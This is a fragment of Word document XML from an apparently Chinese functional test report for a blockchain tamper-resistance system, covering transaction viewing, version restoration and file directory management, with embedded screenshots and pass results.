          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6551762A"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012F080C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33D5BD4A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="323" w:name="_Toc36487942"/>
      <w:r w:rsidRPr="00536672">
        <w:t>当前交易</w:t>
      </w:r>
      <w:bookmarkEnd w:id="323"/>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32D6FC99" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29CB8BF8"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00C5799C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>当前交易</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="3F22DB9A" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CA54E23"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6CB38C86" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>界面测试、接口数据测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="45EFF052" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="374F8494"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009DEF3F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>区块链防篡改功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="58C56F36" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20E3489E"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4A6597A2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="0496D757" wp14:editId="29CFD8C2">
                  <wp:extent cx="4104005" cy="1906270"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="24130"/>
                  <wp:docPr id="126" name="图片 12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片3"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId54"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1906270"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="36771192" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="25BB4E24" wp14:editId="1DB16F61">
                  <wp:extent cx="4104005" cy="2075815"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="6985"/>
                  <wp:docPr id="513" name="图片 51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4"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId55"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2075815"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="10E9E136" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>可以看到当前所有交易，以及每笔交易的详细信息。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77719FEB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="3B0AADD6" wp14:editId="23BBBD2A">
                  <wp:extent cx="4104005" cy="2044065"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="13335"/>
                  <wp:docPr id="514" name="图片 51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5"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId56"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2044065"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D10E943" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>新增资产，增加一笔交易。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CD1A8F2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="7454C69A" wp14:editId="7353F3AF">
                  <wp:extent cx="4104005" cy="2066290"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="16510"/>
                  <wp:docPr id="515" name="图片 515"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7"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId57"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2066290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="424B448C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>资产转移，形成资产链。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C9199C8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6044BDF7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2948577D"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57512D53" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>界面显示正常，接口数据正常。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="3985A38F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48388D63"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3C94F4F1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56E06EE7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="324" w:name="_Toc36487943"/>
      <w:bookmarkStart w:id="325" w:name="_Toc36573240"/>
      <w:bookmarkStart w:id="326" w:name="_Toc36630326"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区块链防篡改</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:t>测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="324"/>
      <w:bookmarkEnd w:id="325"/>
      <w:bookmarkEnd w:id="326"/>
    </w:p>
    <w:p w14:paraId="7B0B7878" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="327" w:name="_Toc36487944"/>
      <w:r w:rsidRPr="00536672">
        <w:t>版本信息维护</w:t>
      </w:r>
      <w:bookmarkEnd w:id="327"/>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11AF9D43" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02198AA9"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28E91AA3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>版本信息维护</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1C918A15" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1930C6BE"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7F4531B9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面测试，恢复版本功能测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6C2D3D96" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="166B157B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>预设条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2523DEF6"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66814C12" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EA08281"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0EBB4EA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114300" distR="114300" wp14:anchorId="76B87695" wp14:editId="1DAA35A1">
                  <wp:extent cx="4198620" cy="2138045"/>
                  <wp:effectExtent l="0" t="0" r="17780" b="20955"/>
                  <wp:docPr id="5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58"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4198620" cy="2138045"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="42C4401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恢复版本信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DDAB43F"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114300" distR="114300" wp14:anchorId="25D832F0" wp14:editId="7226E5AB">
                  <wp:extent cx="4199255" cy="1890395"/>
                  <wp:effectExtent l="0" t="0" r="17145" b="14605"/>
                  <wp:docPr id="5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59"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4199255" cy="1890395"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A41E08E"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查看详情，点击开始恢复</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C50713D"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114300" distR="114300" wp14:anchorId="5945D212" wp14:editId="6698ED9B">
                  <wp:extent cx="4194175" cy="2470150"/>
                  <wp:effectExtent l="0" t="0" r="22225" b="19050"/>
                  <wp:docPr id="5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60"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4194175" cy="2470150"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="15152035" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="01BD5F21" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09503EEF"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668B1BFB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>恢复版本成功。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0D6354A7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58F71A87"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1AC186F6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36B33082" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="328" w:name="_Toc36487945"/>
      <w:r w:rsidRPr="00536672">
        <w:lastRenderedPageBreak/>
        <w:t>文件管理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="328"/>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0C78556C" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1358BAA7"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4DFD60D3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>文件管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6A4A8DBF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F71D0BE"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4C621849" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>查看文件目录历史版本，停用、启用文件目录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="569D4637" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="492CC170"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5505B27D"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2CE811D0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A9B9FE4"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6F51EDF4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>查看主机列表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35229AB5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="13E030D2" wp14:editId="1ABDB624">
                  <wp:extent cx="4199890" cy="1244600"/>
                  <wp:effectExtent l="0" t="0" r="16510" b="0"/>
                  <wp:docPr id="5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61"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4199890" cy="1244600"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B95EF58" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击节点，查看文件目录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="120BB16D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="7B015259" wp14:editId="7CC12746">
                  <wp:extent cx="4193540" cy="933450"/>
                  <wp:effectExtent l="0" t="0" r="22860" b="6350"/>
                  <wp:docPr id="5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62"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
